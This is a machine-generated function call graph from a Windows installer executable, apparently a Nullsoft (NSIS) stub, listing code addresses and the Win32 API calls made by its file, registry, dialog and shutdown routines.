3978 405bfe CharNextW CharNextW 3941->3978 3944 4059b0 3944->3903 3944->3904 3945 406516 5 API calls 3951 405c82 3945->3951 3946 405cb3 lstrlenW 3947 405cbe 3946->3947 3946->3951 3949 405b53 3 API calls 3947->3949 3948 4065c5 2 API calls 3948->3951 3950 405cc3 GetFileAttributesW 3949->3950 3950->3944 3951->3944 3951->3946 3951->3948 3952 405b9f 2 API calls 3951->3952 3952->3946 3953->3908 3955 405bad 3954->3955 3956 405bb3 CharPrevW 3955->3956 3957 405bbf 3955->3957 3956->3955 3956->3957 3957->3911 3958->3924 3984 405d4f GetFileAttributesW 3959->3984 3962 405975 3962->3933 3963 405963 RemoveDirectoryW 3965 405971 3963->3965 3964 40596b DeleteFileW 3964->3965 3965->3962 3966 405981 SetFileAttributesW 3965->3966 3966->3962 3968 406069 3967->3968 3969 40605c 3967->3969 3968->3933 3987 405ece 3969->3987 3972 405b14 3971->3972 3973 4065db FindClose 3971->3973 3972->3905 3972->3916 3973->3972 3975 405b1e 3974->3975 3976 405b6f lstrcatW 3974->3976 3975->3921 3976->3975 3977->3941 3979 405c1b 3978->3979 3983 405c2d 3978->3983 3981 405c28 CharNextW 3979->3981 3979->3983 3980 405c51 3980->3944 3980->3945 3981->3980 3982 405b80 CharNextW 3982->3983 3983->3980 3983->3982 3985 405d61 SetFileAttributesW 3984->3985 3986 405954 3984->3986 3985->3986 3986->3962 3986->3963 3986->3964 3988 405f24 GetShortPathNameW 3987->3988 3989 405efe 3987->3989 3990 406043 3988->3990 3991 405f39 3988->3991 4014 405d74 GetFileAttributesW CreateFileW 3989->4014 3990->3968 3991->3990 3993 405f41 wsprintfA 3991->3993 3995 4062a4 17 API calls 3993->3995 3994 405f08 CloseHandle GetShortPathNameW 3994->3990 3996 405f1c 3994->3996 3997 405f69 3995->3997 3996->3988 3996->3990 4015 405d74 GetFileAttributesW CreateFileW 3997->4015 3999 405f76 3999->3990 4000 405f85 GetFileSize GlobalAlloc 3999->4000 4001 405fa7 4000->4001 4002 40603c CloseHandle 4000->4002 4016 405df7 ReadFile 4001->4016 4002->3990 4007 405fc6 lstrcpyA 4010 405fe8 4007->4010 4008 405fda 4009 405cd9 4 API calls 4008->4009 4009->4010 4011 40601f SetFilePointer 4010->4011 4023 405e26 WriteFile 4011->4023 4014->3994 4015->3999 4017 405e15 4016->4017 4017->4002 4018 405cd9 lstrlenA 4017->4018 4019 405d1a lstrlenA 4018->4019 4020 405d22 4019->4020 4021 405cf3 lstrcmpiA 4019->4021 4020->4007 4020->4008 4021->4020 4022 405d11 CharNextA 4021->4022 4022->4019 4024 405e44 GlobalFree 4023->4024 4024->4002 4025 4015c1 4026 402c37 17 API calls 4025->4026 4027 4015c8 4026->4027 4028 405bfe 4 API calls 4027->4028 4040 4015d1 4028->4040 4029 401631 4031 401663 4029->4031 4032 401636 4029->4032 4030 405b80 CharNextW 4030->4040 4034 401423 24 API calls 4031->4034 4052 401423 4032->4052 4041 40165b 4034->4041 4039 40164a SetCurrentDirectoryW 4039->4041 4040->4029 4040->4030 4042 401617 GetFileAttributesW 4040->4042 4044 40584f 4040->4044 4047 4057b5 CreateDirectoryW 4040->4047 4056 405832 CreateDirectoryW 4040->4056 4042->4040 4059 40665c GetModuleHandleA 4044->4059 4048 405802 4047->4048 4049 405806 GetLastError 4047->4049 4048->4040 4049->4048 4050 405815 SetFileSecurityW 4049->4050 4050->4048 4051 40582b GetLastError 4050->4051 4051->4048 4053 4052e6 24 API calls 4052->4053 4054 401431 4053->4054 4055 406282 lstrcpynW 4054->4055 4055->4039 4057 405842 4056->4057 4058 405846 GetLastError 4056->4058 4057->4040 4058->4057 4060 406682 GetProcAddress 4059->4060 4061 406678 4059->4061 4064 405856 4060->4064 4065 4065ec GetSystemDirectoryW 4061->4065 4063 40667e 4063->4060 4063->4064 4064->4040 4066 40660e wsprintfW LoadLibraryExW 4065->4066 4066->4063 4181 401e43 4189 402c15 4181->4189 4183 401e49 4184 402c15 17 API calls 4183->4184 4185 401e55 4184->4185 4186 401e61 ShowWindow 4185->4186 4187 401e6c EnableWindow 4185->4187 4188 402abf 4186->4188 4187->4188 4190 4062a4 17 API calls 4189->4190 4191 402c2a 4190->4191 4191->4183 4192 402644 4193 402c15 17 API calls 4192->4193 4201 402653 4193->4201 4194 402790 4195 40269d ReadFile 4195->4194 4195->4201 4196 402736 4196->4194 4196->4201 4206 405e55 SetFilePointer 4196->4206 4197 405df7 ReadFile 4197->4201 4199 402792 4215 4061c9 wsprintfW 4199->4215 4200 4026dd MultiByteToWideChar 4200->4201 4201->4194 4201->4195 4201->4196 4201->4197 4201->4199 4201->4200 4203 402703 SetFilePointer MultiByteToWideChar 4201->4203 4204 4027a3 4201->4204 4203->4201 4204->4194 4205 4027c4 SetFilePointer 4204->4205 4205->4194 4207 405e71 4206->4207 4212 405e8d 4206->4212 4208 405df7 ReadFile 4207->4208 4209 405e7d 4208->4209 4210 405e96 SetFilePointer 4209->4210 4211 405ebe SetFilePointer 4209->4211 4209->4212 4210->4211 4213 405ea1 4210->4213 4211->4212 4212->4196 4214 405e26 WriteFile 4213->4214 4214->4212 4215->4194 4226 402348 4227 402c37 17 API calls 4226->4227 4228 402357 4227->4228 4229 402c37 17 API calls 4228->4229 4230 402360 4229->4230 4231 402c37 17 API calls 4230->4231 4232 40236a GetPrivateProfileStringW 4231->4232 4951 4016cc 4952 402c37 17 API calls 4951->4952 4953 4016d2 GetFullPathNameW 4952->4953 4954 40170e 4953->4954 4955 4016ec 4953->4955 4956 401723 GetShortPathNameW 4954->4956 4957 402abf 4954->4957 4955->4954 4958 4065c5 2 API calls 4955->4958 4956->4957 4959 4016fe 4958->4959 4959->4954 4961 406282 lstrcpynW 4959->4961 4961->4954 4962 401b4d 4963 402c37 17 API calls 4962->4963 4964 401b54 4963->4964 4965 402c15 17 API calls 4964->4965 4966 401b5d wsprintfW 4965->4966 4967 402abf 4966->4967 4968 40394e 4969 403959 4968->4969 4970 403960 GlobalAlloc 4969->4970 4971 40395d 4969->4971 4970->4971 4972 401f52 4973 402c37 17 API calls 4972->4973 4974 401f59 4973->4974 4975 4065c5 2 API calls 4974->4975 4976 401f5f 4975->4976 4978 401f70 4976->4978 4979 4061c9 wsprintfW 4976->4979 4979->4978 4980 402253 4981 402c37 17 API calls 4980->4981 4982 402259 4981->4982 4983 402c37 17 API calls 4982->4983 4984 402262 4983->4984 4985 402c37 17 API calls 4984->4985 4986 40226b 4985->4986 4987 4065c5 2 API calls 4986->4987 4988 402274 4987->4988 4989 402285 lstrlenW lstrlenW 4988->4989 4993 402278 4988->4993 4990 4052e6 24 API calls 4989->4990 4992 4022c3 SHFileOperationW 4990->4992 4991 4052e6 24 API calls 4994 402280 4991->4994 4992->4993 4992->4994 4993->4991 4995 401956 4996 402c37 17 API calls 4995->4996 4997 40195d lstrlenW 4996->4997 4998 40258c 4997->4998 4999 4014d7 5000 402c15 17 API calls 4999->5000 5001 4014dd Sleep 5000->5001 5003 402abf 5001->5003 5004 4022d7 5005 4022de 5004->5005 5009 4022f1 5004->5009 5006 4062a4 17 API calls 5005->5006 5007 4022eb 5006->5007 5008 4058e4 MessageBoxIndirectW 5007->5008 5008->5009 5010 401d57 GetDlgItem GetClientRect 5011 402c37 17 API calls 5010->5011 5012 401d89 LoadImageW SendMessageW 5011->5012 5013 401da7 DeleteObject 5012->5013 5014 402abf 5012->5014 5013->5014 5015 402dd7 5016 402e02 5015->5016 5017 402de9 SetTimer 5015->5017 5018 402e57 5016->5018 5019 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5016->5019 5017->5016 5019->5018 4799 40525a 4800 40526a 4799->4800 4801 40527e 4799->4801 4802 405270 4800->4802 4812 4052c7 4800->4812 4803 405286 IsWindowVisible 4801->4803 4807 4052a6 4801->4807 4805 404263 SendMessageW 4802->4805 4806 405293 4803->4806 4803->4812 4804 4052cc CallWindowProcW 4808 40527a 4804->4808 4805->4808 4809 404bb0 5 API calls 4806->4809 4807->4804 4811 404c30 4 API calls 4807->4811 4810 40529d 4809->4810 4810->4807 4811->4812 4812->4804 4813 40175c 4814 402c37 17 API calls 4813->4814 4815 401763 4814->4815 4816 405da3 2 API calls 4815->4816 4817 40176a 4816->4817 4818 405da3 2 API calls 4817->4818 4818->4817 4819 4023de 4820 402c37 17 API calls 4819->4820 4821 4023f0 4820->4821 4822 402c37 17 API calls 4821->4822 4823 4023fa 4822->4823 4836 402cc7 4823->4836 4826 402432 4827 40243e 4826->4827 4830 402c15 17 API calls 4826->4830 4831 40245d RegSetValueExW 4827->4831 4833 4030fa 31 API calls 4827->4833 4828 402885 4829 402c37 17 API calls 4832 402428 lstrlenW 4829->4832 4830->4827 4834 402473 RegCloseKey 4831->4834 4832->4826 4833->4831 4834->4828 4837 402ce2 4836->4837 4840 40611d 4837->4840 4841 40612c 4840->4841 4842 40240a 4841->4842 4843 406137 RegCreateKeyExW 4841->4843 4842->4826 4842->4828 4842->4829 4843->4842 4068 404c62 GetDlgItem GetDlgItem 4069 404cb4 7 API calls 4068->4069 4077 404ecd 4068->4077 4070 404d57 DeleteObject 4069->4070 4071 404d4a SendMessageW 4069->4071 4072 404d60 4070->4072 4071->4070 4073 404d6f 4072->4073 4074 404d97 4072->4074 4075 4062a4 17 API calls 4073->4075 4124 404217 4074->4124 4080 404d79 SendMessageW SendMessageW 4075->4080 4076 404f92 4086 404fb1 4076->4086 4088 404fa3 SendMessageW 4076->4088 4077->4076 4083 404f2d 4077->4083 4077->4086 4079 40505d 4081 405067 SendMessageW 4079->4081 4082 40506f 4079->4082 4080->4072 4081->4082 4093 405081 ImageList_Destroy 4082->4093 4094 405088 4082->4094 4104 405098 4082->4104 4129 404bb0 SendMessageW 4083->4129 4084 404dab 4090 404217 18 API calls 4084->4090 4085 405245 4146 40427e 4085->4146 4086->4079 4086->4085 4091 40500a SendMessageW 4086->4091 4088->4086 4110 404db9 4090->4110 4091->4085 4095 40501f SendMessageW 4091->4095 4093->4094 4097 405091 GlobalFree 4094->4097 4094->4104 4099 405032 4095->4099 4096 405207 4096->4085 4100 405219 ShowWindow GetDlgItem ShowWindow 4096->4100 4097->4104 4098 404e8e GetWindowLongW SetWindowLongW 4101 404ea7 4098->4101 4105 405043 SendMessageW 4099->4105 4100->4085 4102 404ec5 4101->4102 4103 404ead ShowWindow 4101->4103 4128 40424c SendMessageW 4102->4128 4127 40424c SendMessageW 4103->4127 4104->4096 4119 4050d3 4104->4119 4134 404c30 4104->4134 4105->4079 4106 404e88 4106->4098 4106->4101 4109 404f3e 4109->4076 4110->4098 4110->4106 4111 404e09 SendMessageW 4110->4111 4112 404e45 SendMessageW 4110->4112 4113 404e56 SendMessageW 4110->4113 4111->4110 4112->4110 4113->4110 4115 404ec0 4115->4085 4116 4051dd InvalidateRect 4116->4096 4117 4051f3 4116->4117 4143 404b6b 4117->4143 4118 405101 SendMessageW 4120 405117 4118->4120 4119->4118 4119->4120 4120->4116 4121 405178 4120->4121 4123 40518b SendMessageW SendMessageW 4120->4123 4121->4123 4123->4120 4125 4062a4 17 API calls 4124->4125 4126 404222 SetDlgItemTextW 4125->4126 4126->4084 4127->4115 4128->4077 4130 404bd3 GetMessagePos ScreenToClient SendMessageW 4129->4130 4131 404c0f SendMessageW 4129->4131 4132 404c07 4130->4132 4133 404c0c 4130->4133 4131->4132 4132->4109 4133->4131 4160 406282 lstrcpynW 4134->4160 4136 404c43 4161 4061c9 wsprintfW 4136->4161 4138 404c4d 4162 40140b 4138->4162 4142 404c5d 4142->4119 4170 404aa2 4143->4170 4145 404b80 4145->4096 4147 404296 GetWindowLongW 4146->4147 4148 40431f 4146->4148 4147->4148 4149 4042a7 4147->4149 4150 4042b6 GetSysColor 4149->4150 4151 4042b9 4149->4151 4150->4151 4152 4042c9 SetBkMode 4151->4152 4153 4042bf SetTextColor 4151->4153 4154 4042e1 GetSysColor 4152->4154 4155 4042e7 4152->4155 4153->4152 4154->4155 4156 4042f8 4155->4156 4157 4042ee SetBkColor 4155->4157 4156->4148 4158 404312 CreateBrushIndirect 4156->4158 4159 40430b DeleteObject 4156->4159 4157->4156 4158->4148 4159->4158 4160->4136 4161->4138 4166 401389 4162->4166 4165 406282 lstrcpynW 4165->4142 4168 401390 4166->4168 4167 4013fe 4167->4165 4168->4167 4169 4013cb MulDiv SendMessageW 4168->4169 4169->4168 4171 404abb 4170->4171 4172 4062a4 17 API calls 4171->4172 4173 404b1f 4172->4173 4174 4062a4 17 API calls 4173->4174 4175 404b2a 4174->4175 4176 4062a4 17 API calls 4175->4176 4177 404b40 lstrlenW wsprintfW SetDlgItemTextW 4176->4177 4177->4145 5020 402862 5021 402c37 17 API calls 5020->5021 5022 402869 FindFirstFileW 5021->5022 5023 402891 5022->5023 5024 40287c 5022->5024 5028 4061c9 wsprintfW 5023->5028 5026 40289a 5029 406282 lstrcpynW 5026->5029 5028->5026 5029->5024 5030 401563 5031 402a65 5030->5031 5034 4061c9 wsprintfW 5031->5034 5033 402a6a 5034->5033 5035 404365 lstrlenW 5036 404384 5035->5036 5037 404386 WideCharToMultiByte 5035->5037 5036->5037 5038 4046e6 5039 404712 5038->5039 5040 404723 5038->5040 5099 4058c8 GetDlgItemTextW 5039->5099 5041 40472f GetDlgItem 5040->5041 5044 40478e 5040->5044 5043 404743 5041->5043 5048 404757 SetWindowTextW 5043->5048 5051 405bfe 4 API calls 5043->5051 5045 404872 5044->5045 5053 4062a4 17 API calls 5044->5053 5097 404a21 5044->5097 5045->5097 5101 4058c8 GetDlgItemTextW 5045->5101 5046 40471d 5047 406516 5 API calls 5046->5047 5047->5040 5052 404217 18 API calls 5048->5052 5050 40427e 8 API calls 5055 404a35 5050->5055 5056 40474d 5051->5056 5057 404773 5052->5057 5058 404802 SHBrowseForFolderW 5053->5058 5054 4048a2 5059 405c5b 18 API calls 5054->5059 5056->5048 5062 405b53 3 API calls 5056->5062 5060 404217 18 API calls 5057->5060 5058->5045 5061 40481a CoTaskMemFree 5058->5061 5065 4048a8 5059->5065 5063 404781 5060->5063 5064 405b53 3 API calls 5061->5064 5062->5048 5100 40424c SendMessageW 5063->5100 5067 404827 5064->5067 5102 406282 lstrcpynW 5065->5102 5070 40485e SetDlgItemTextW 5067->5070 5074 4062a4 17 API calls 5067->5074 5069 404787 5073 40665c 5 API calls 5069->5073 5070->5045 5071 4048bf 5072 40665c 5 API calls 5071->5072 5080 4048c6 5072->5080 5073->5044 5075 404846 lstrcmpiW 5074->5075 5075->5070 5077 404857 lstrcatW 5075->5077 5076 404907 5103 406282 lstrcpynW 5076->5103 5077->5070 5079 40490e 5081 405bfe 4 API calls 5079->5081 5080->5076 5085 405b9f 2 API calls 5080->5085 5086 40495f 5080->5086 5082 404914 GetDiskFreeSpaceW 5081->5082 5084 404938 MulDiv 5082->5084 5082->5086 5084->5086 5085->5080 5087 4049d0 5086->5087 5089 404b6b 20 API calls 5086->5089 5088 4049f3 5087->5088 5090 40140b 2 API calls 5087->5090 5104 404239 EnableWindow 5088->5104 5091 4049bd 5089->5091 5090->5088 5092 4049d2 SetDlgItemTextW 5091->5092 5093 4049c2 5091->5093 5092->5087 5095 404aa2 20 API calls 5093->5095 5095->5087 5096 404a0f 5096->5097 5105 40463f 5096->5105 5097->5050 5099->5046 5100->5069 5101->5054 5102->5071 5103->5079 5104->5096 5106 404652 SendMessageW 5105->5106 5107 40464d 5105->5107 5106->5097 5107->5106 5108 401968 5109 402c15 17 API calls 5108->5109 5110 40196f 5109->5110 5111 402c15 17 API calls 5110->5111 5112 40197c 5111->5112 5113 402c37 17 API calls 5112->5113 5114 401993 lstrlenW 5113->5114 5115 4019a4 5114->5115 5119 4019e5 5115->5119 5120 406282 lstrcpynW 5115->5120 5117 4019d5 5118 4019da lstrlenW 5117->5118 5117->5119 5118->5119 5120->5117 4267 4027e9 4268 4027f0 4267->4268 4270 402a6a 4267->4270 4269 402c15 17 API calls 4268->4269 4271 4027f7 4269->4271 4272 402806 SetFilePointer 4271->4272 4272->4270 4273 402816 4272->4273 4275 4061c9 wsprintfW 4273->4275 4275->4270 5121 100018a9 5122 100018cc 5121->5122 5123 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5122->5123 5124 100018ff GlobalFree 5122->5124 5125 10001272 2 API calls 5123->5125 5124->5123 5126 10001a87 GlobalFree GlobalFree 5125->5126 5127 40166a 5128 402c37 17 API calls 5127->5128 5129 401670 5128->5129 5130 4065c5 2 API calls 5129->5130 5131 401676 5130->5131 5132 401ced 5133 402c15 17 API calls 5132->5133 5134 401cf3 IsWindow 5133->5134 5135 401a20 5134->5135 4459 40176f 4460 402c37 17 API calls 4459->4460 4461 401776 4460->4461 4462 401796 4461->4462 4463 40179e 4461->4463 4519 406282 lstrcpynW 4462->4519 4520 406282 lstrcpynW 4463->4520 4466 40179c 4470 406516 5 API calls 4466->4470 4467 4017a9 4468 405b53 3 API calls 4467->4468 4469 4017af lstrcatW 4468->4469 4469->4466 4487 4017bb 4470->4487 4471 4065c5 2 API calls 4471->4487 4472 4017f7 4473 405d4f 2 API calls 4472->4473 4473->4487 4475 4017cd CompareFileTime 4475->4487 4476 40188d 4478 4052e6 24 API calls 4476->4478 4477 401864 4481 4052e6 24 API calls 4477->4481 4488 401879 4477->4488 4480 401897 4478->4480 4479 406282 lstrcpynW 4479->4487 4499 4030fa 4480->4499 4481->4488 4484 4018be SetFileTime 4486 4018d0 CloseHandle 4484->4486 4485 4062a4 17 API calls 4485->4487 4486->4488 4489 4018e1 4486->4489 4487->4471 4487->4472 4487->4475 4487->4476 4487->4477 4487->4479 4487->4485 4498 405d74 GetFileAttributesW CreateFileW 4487->4498 4521 4058e4 4487->4521 4490 4018e6 4489->4490 4491 4018f9 4489->4491 4493 4062a4 17 API calls 4490->4493 4492 4062a4 17 API calls 4491->4492 4494 401901 4492->4494 4496 4018ee lstrcatW 4493->4496 4497 4058e4 MessageBoxIndirectW 4494->4497 4496->4494 4497->4488 4498->4487 4501 403113 4499->4501 4500 403141 4525 403315 4500->4525 4501->4500 4528 40332b SetFilePointer 4501->4528 4505 4032ae 4507 4032f0 4505->4507 4511 4032b2 4505->4511 4506 40315e GetTickCount 4510 4018aa 4506->4510 4518 4031ad 4506->4518 4509 403315 ReadFile 4507->4509 4508 403315 ReadFile 4508->4518 4509->4510 4510->4484 4510->4486 4511->4510 4512 403315 ReadFile 4511->4512 4513 405e26 WriteFile 4511->4513 4512->4511 4513->4511 4514 403203 GetTickCount 4514->4518 4515 403228 MulDiv wsprintfW 4516 4052e6 24 API calls 4515->4516 4516->4518 4517 405e26 WriteFile 4517->4518 4518->4508 4518->4510 4518->4514 4518->4515 4518->4517 4519->4466 4520->4467 4522 4058f9 4521->4522 4523 405945 4522->4523 4524 40590d MessageBoxIndirectW 4522->4524 4523->4487 4524->4523 4526 405df7 ReadFile 4525->4526 4527 40314c 4526->4527 4527->4505 4527->4506 4527->4510 4528->4500 5136 402570 5137 402c37 17 API calls 5136->5137 5138 402577 5137->5138 5141 405d74 GetFileAttributesW CreateFileW 5138->5141 5140 402583 5141->5140 4529 401b71 4530 401bc2 4529->4530 4531 401b7e 4529->4531 4532 401bc7 4530->4532 4533 401bec GlobalAlloc 4530->4533 4534 401c07 4531->4534 4539 401b95 4531->4539 4543 4022f1 4532->4543 4550 406282 lstrcpynW 4532->4550 4536 4062a4 17 API calls 4533->4536 4535 4062a4 17 API calls 4534->4535 4534->4543 4538 4022eb 4535->4538 4536->4534 4542 4058e4 MessageBoxIndirectW 4538->4542 4548 406282 lstrcpynW 4539->4548 4540 401bd9 GlobalFree 4540->4543 4542->4543 4544 401ba4 4549 406282 lstrcpynW 4544->4549 4546 401bb3 4551 406282 lstrcpynW 4546->4551 4548->4544 4549->4546 4550->4540 4551->4543 5142 401a72 5143 402c15 17 API calls 5142->5143 5144 401a78 5143->5144 5145 402c15 17 API calls 5144->5145 5146 401a20 5145->5146 5147 4024f2 5148 402c77 17 API calls 5147->5148 5149 4024fc 5148->5149 5150 402c15 17 API calls 5149->5150 5151 402505 5150->5151 5152 402521 RegEnumKeyW 5151->5152 5153 40252d RegEnumValueW 5151->5153 5155 402885 5151->5155 5154 402542 RegCloseKey 5152->5154 5153->5154 5154->5155 4552 403373 SetErrorMode GetVersion 4553 4033b2 4552->4553 4554 4033b8 4552->4554 4555 40665c 5 API calls 4553->4555 4556 4065ec 3 API calls 4554->4556 4555->4554 4557 4033ce lstrlenA 4556->4557 4557->4554 4558 4033de 4557->4558 4559 40665c 5 API calls 4558->4559 4560 4033e5 4559->4560 4561 40665c 5 API calls 4560->4561 4562 4033ec 4561->4562 4563 40665c 5 API calls 4562->4563 4564 4033f8 #17 OleInitialize SHGetFileInfoW 4563->4564 4643 406282 lstrcpynW 4564->4643 4567 403444 GetCommandLineW 4644 406282 lstrcpynW 4567->4644 4569 403456 GetModuleHandleW 4570 40346e 4569->4570 4571 405b80 CharNextW 4570->4571 4572 40347d CharNextW 4571->4572 4573 4035a7 GetTempPathW 4572->4573 4582 403496 4572->4582 4645 403342 4573->4645 4575 4035bf 4576 4035c3 GetWindowsDirectoryW lstrcatW 4575->4576 4577 403619 DeleteFileW 4575->4577 4578 403342 12 API calls 4576->4578 4655 402ec1 GetTickCount GetModuleFileNameW 4577->4655 4581 4035df 4578->4581 4579 405b80 CharNextW 4579->4582 4581->4577 4584 4035e3 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4581->4584 4582->4579 4588 403592 4582->4588 4590 403590 4582->4590 4583 40362d 4585 4036e0 4583->4585 4586 4036d0 4583->4586 4591 405b80 CharNextW 4583->4591 4589 403342 12 API calls 4584->4589 4742 4038b6 4585->4742 4683 403990 4586->4683 4739 406282 lstrcpynW 4588->4739 4595 403611 4589->4595 4590->4573 4607 40364c 4591->4607 4595->4577 4595->4585 4596 40381a 4599 403822 GetCurrentProcess OpenProcessToken 4596->4599 4600 40389e ExitProcess 4596->4600 4597 4036fa 4598 4058e4 MessageBoxIndirectW 4597->4598 4604 403708 ExitProcess 4598->4604 4605 40383a LookupPrivilegeValueW AdjustTokenPrivileges 4599->4605 4606 40386e 4599->4606 4602 403710 4609 40584f 5 API calls 4602->4609 4603 4036aa 4608 405c5b 18 API calls 4603->4608 4605->4606 4610 40665c 5 API calls 4606->4610 4607->4602 4607->4603 4612 4036b6 4608->4612 4613 403715 lstrcatW 4609->4613 4611 403875 4610->4611 4614 40388a ExitWindowsEx 4611->4614 4617 403897 4611->4617 4612->4585 4740 406282 lstrcpynW 4612->4740 4615 403731 lstrcatW lstrcmpiW 4613->4615 4616 403726 lstrcatW 4613->4616 4614->4600 4614->4617 4615->4585 4619 40374d 4615->4619 4616->4615 4622 40140b 2 API calls 4617->4622 4620 403752 4619->4620 4621 403759 4619->4621 4624 4057b5 4 API calls 4620->4624 4625 405832 2 API calls 4621->4625 4622->4600 4623 4036c5 4741 406282 lstrcpynW 4623->4741 4627 403757 4624->4627 4628 40375e SetCurrentDirectoryW 4625->4628 4627->4628 4629 403779 4628->4629 4630 40376e 4628->4630 4750 406282 lstrcpynW 4629->4750 4749 406282 lstrcpynW 4630->4749 4633 4062a4 17 API calls 4634 4037b8 DeleteFileW 4633->4634 4635 4037c5 CopyFileW 4634->4635 4640 403787 4634->4640 4635->4640 4636 40380e 4638 406048 36 API calls 4636->4638 4637 406048 36 API calls 4637->4640 4638->4585 4639 4062a4 17 API calls 4639->4640 4640->4633 4640->4636 4640->4637 4640->4639 4641 405867 2 API calls 4640->4641 4642 4037f9 CloseHandle 4640->4642 4641->4640 4642->4640 4643->4567 4644->4569 4646 406516 5 API calls 4645->4646 4647 40334e 4646->4647 4648 403358 4647->4648 4649 405b53 3 API calls 4647->4649 4648->4575 4650 403360 4649->4650 4651 405832 2 API calls 4650->4651 4652 403366 4651->4652 4751 405da3 4652->4751 4755 405d74 GetFileAttributesW CreateFileW 4655->4755 4657 402f01 4676 402f11 4657->4676 4756 406282 lstrcpynW 4657->4756 4659 402f27 4660 405b9f 2 API calls 4659->4660 4661 402f2d 4660->4661 4757 406282 lstrcpynW 4661->4757 4663 402f38 GetFileSize 4664 403034 4663->4664 4682 402f4f 4663->4682 4758 402e5d 4664->4758 4666 40303d 4668 40306d GlobalAlloc 4666->4668 4666->4676 4770 40332b SetFilePointer 4666->4770 4667 403315 ReadFile 4667->4682 4769 40332b SetFilePointer 4668->4769 4671 4030a0 4673 402e5d 6 API calls 4671->4673 4672 403088 4675 4030fa 31 API calls 4672->4675 4673->4676 4674 403056 4677 403315 ReadFile 4674->4677 4680 403094 4675->4680 4676->4583 4679 403061 4677->4679 4678 402e5d 6 API calls 4678->4682 4679->4668 4679->4676 4680->4676 4680->4680 4681 4030d1 SetFilePointer 4680->4681 4681->4676 4682->4664 4682->4667 4682->4671 4682->4676 4682->4678 4684 40665c 5 API calls 4683->4684 4685 4039a4 4684->4685 4686 4039aa 4685->4686 4687 4039bc 4685->4687 4779 4061c9 wsprintfW 4686->4779 4688 406150 3 API calls 4687->4688 4689 4039ec 4688->4689 4691 403a0b lstrcatW 4689->4691 4693 406150 3 API calls 4689->4693 4692 4039ba 4691->4692 4771 403c66 4692->4771 4693->4691 4696 405c5b 18 API calls 4697 403a3d 4696->4697 4698 403ad1 4697->4698 4700 406150 3 API calls 4697->4700 4699 405c5b 18 API calls 4698->4699 4701 403ad7 4699->4701 4702 403a6f 4700->4702 4703 403ae7 LoadImageW 4701->4703 4704 4062a4 17 API calls 4701->4704 4702->4698 4707 403a90 lstrlenW 4702->4707 4711 405b80 CharNextW 4702->4711 4705 403b8d 4703->4705 4706 403b0e RegisterClassW 4703->4706 4704->4703 4710 40140b 2 API calls 4705->4710 4708 403b44 SystemParametersInfoW CreateWindowExW 4706->4708 4709 403b97 4706->4709 4712 403ac4 4707->4712 4713 403a9e lstrcmpiW 4707->4713 4708->4705 4709->4585 4714 403b93 4710->4714 4716 403a8d 4711->4716 4715 405b53 3 API calls 4712->4715 4713->4712 4717 403aae GetFileAttributesW 4713->4717 4714->4709 4718 403c66 18 API calls 4714->4718 4719 403aca 4715->4719 4716->4707 4720 403aba 4717->4720 4721 403ba4 4718->4721 4780 406282 lstrcpynW 4719->4780 4720->4712 4723 405b9f 2 API calls 4720->4723 4724 403bb0 ShowWindow 4721->4724 4725 403c33 4721->4725 4723->4712 4727 4065ec 3 API calls 4724->4727 4781 4053b9 OleInitialize 4725->4781 4732 403bc8 4727->4732 4728 403c39 4729 403c55 4728->4729 4730 403c3d 4728->4730 4733 40140b 2 API calls 4729->4733 4730->4709 4737 40140b 2 API calls 4730->4737 4731 403bd6 GetClassInfoW 4735 403c00 DialogBoxParamW 4731->4735 4736 403bea GetClassInfoW RegisterClassW 4731->4736 4732->4731 4734 4065ec 3 API calls 4732->4734 4733->4709 4734->4731 4738 40140b 2 API calls 4735->4738 4736->4735 4737->4709 4738->4709 4739->4590 4740->4623 4741->4586 4743 4038c0 CloseHandle 4742->4743 4744 4038ce 4742->4744 4743->4744 4795 4038fb 4744->4795 4747 405990 67 API calls 4748 4036e9 OleUninitialize 4747->4748 4748->4596 4748->4597 4749->4629 4750->4640 4752 405db0 GetTickCount GetTempFileNameW 4751->4752 4753 403371 4752->4753 4754 405de6 4752->4754 4753->4575 4754->4752 4754->4753 4755->4657 4756->4659 4757->4663 4759 402e66 4758->4759 4760 402e7e 4758->4760 4761 402e76 4759->4761 4762 402e6f DestroyWindow 4759->4762 4763 402e86 4760->4763 4764 402e8e GetTickCount 4760->4764 4761->4666 4762->4761 4765 406698 2 API calls 4763->4765 4766 402e9c CreateDialogParamW ShowWindow 4764->4766 4767 402ebf 4764->4767 4768 402e8c 4765->4768 4766->4767 4767->4666 4768->4666 4769->4672 4770->4674 4772 403c7a 4771->4772 4788 4061c9 wsprintfW 4772->4788 4774 403ceb 4789 403d1f 4774->4789 4776 403a1b 4776->4696 4777 403cf0 4777->4776 4778 4062a4 17 API calls 4777->4778 4778->4777 4779->4692 4780->4698 4792 404263 4781->4792 4783 4053dc 4786 405403 4783->4786 4787 401389 2 API calls 4783->4787 4784 404263 SendMessageW 4785 405415 OleUninitialize 4784->4785 4785->4728 4786->4784 4787->4783 4788->4774 4790 4062a4 17 API calls 4789->4790 4791 403d2d SetWindowTextW 4790->4791 4791->4777 4793 40427b 4792->4793 4794 40426c SendMessageW 4792->4794 4793->4783 4794->4793 4796 403909 4795->4796 4797 40390e FreeLibrary GlobalFree 4796->4797 4798 4038d3 4796->4798 4797->4797 4797->4798 4798->4747 5157 401573 5158 401583 ShowWindow 5157->5158 5159 40158c 5157->5159 5158->5159 5160 40159a ShowWindow 5159->5160 5161 402abf 5159->5161 5160->5161 5162 4014f5 SetForegroundWindow 5163 402abf 5162->5163 5164 100016b6 5165 100016e5 5164->5165 5166 10001b18 22 API calls 5165->5166 5167 100016ec 5166->5167 5168 100016f3 5167->5168 5169 100016ff 5167->5169 5172 10001272 2 API calls 5168->5172 5170 10001726 5169->5170 5171 10001709 5169->5171 5174 10001750 5170->5174 5175 1000172c 5170->5175 5173 1000153d 3 API calls 5171->5173 5176 100016fd 5172->5176 5177 1000170e 5173->5177 5179 1000153d 3 API calls 5174->5179 5178 100015b4 3 API calls 5175->5178 5180 100015b4 3 API calls 5177->5180 5181 10001731 5178->5181 5179->5176 5182 10001714 5180->5182 5183 10001272 2 API calls 5181->5183 5184 10001272 2 API calls 5182->5184 5185 10001737 GlobalFree 5183->5185 5186 1000171a GlobalFree 5184->5186 5185->5176 5187 1000174b GlobalFree 5185->5187 5186->5176 5187->5176 5188 401e77 5189 402c37 17 API calls 5188->5189 5190 401e7d 5189->5190 5191 402c37 17 API calls 5190->5191 5192 401e86 